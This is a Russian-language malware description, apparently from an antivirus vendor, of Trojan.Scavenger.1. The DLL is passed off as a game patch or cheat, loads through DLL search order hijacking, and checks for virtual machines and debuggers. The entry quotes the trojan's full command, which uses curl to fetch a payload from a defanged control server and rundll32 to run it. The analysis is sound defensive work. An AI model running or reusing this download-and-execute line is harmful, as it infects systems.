sha1:
- 60fca6ad18c8574f5234fdd47963d6fb9a6e113e (umpdc.dll)
Описание
Вредоносная программа на языке C++, один из компонентов семейства Trojan.Scavenger. Распространяется под видом патчей или читов для игр и представляет собой динамическую библиотеку. Trojan.Scavenger.1 скачивает с управляющего сервера и запускает в инфицированной системе другой компонент семейства, Trojan.Scavenger.2, который является следующей ступенью заражения.
Принцип действия
ЗапускПотенциальные жертвы по инструкции злоумышленников самостоятельно копируют DLL-файл трояна в каталог легитимного приложения — якобы для применения «патча». Trojan.Scavenger.1 имеет имя системной библиотеки umpdc.dll и через эксплуатацию уязвимости DLL Search Order Hijacking запускается как часть целевой программы.
Проверка окруженияПри запуске Trojan.Scavenger.1 предварительно выполняет стандартную для представителей этого семейства проверку окружения. При обнаружении признаков запуска в виртуальной среде или в режиме отладки троян прекращает работу.
Помимо выполнения стандартных шагов он также дополнительно проверяет:
-
Наличие директории %TEMP%\SCVNGR_VM (признак того, что троян запущен в тестовой виртуальной среде SCVNGR его создателей). При данной проверке опускается часть шагов из стандартной процедуры, связанных с проверкой виртуальных машин. Этот режим используется вирусописателями для тестирования трояна в собственных виртуальных средах.
-
Успешность выполнения операции NtQuerySystemInformation(SystemExtendedHandleInformation).
Для скачивания на целевой компьютер и запуска полезной нагрузки Trojan.Scavenger.1 выполняет команду
cmd /c curl hxxps[:]//ac7b2eda6f14[.]datahog[.]su/2w3e98t5zh298w3tzhg7982w3t4eg -o "%TEMP%\tmp6FC15.tmp" > NUL && move "%TEMP%\tmp6FC15.tmp" "%TEMP%\tmp6FC15.dll" && rundll32 "%TEMP%\tmp6FC15.dll",main
Подробнее о Trojan.Scavenger.2
Новость о трояне
Индикаторы компрометации
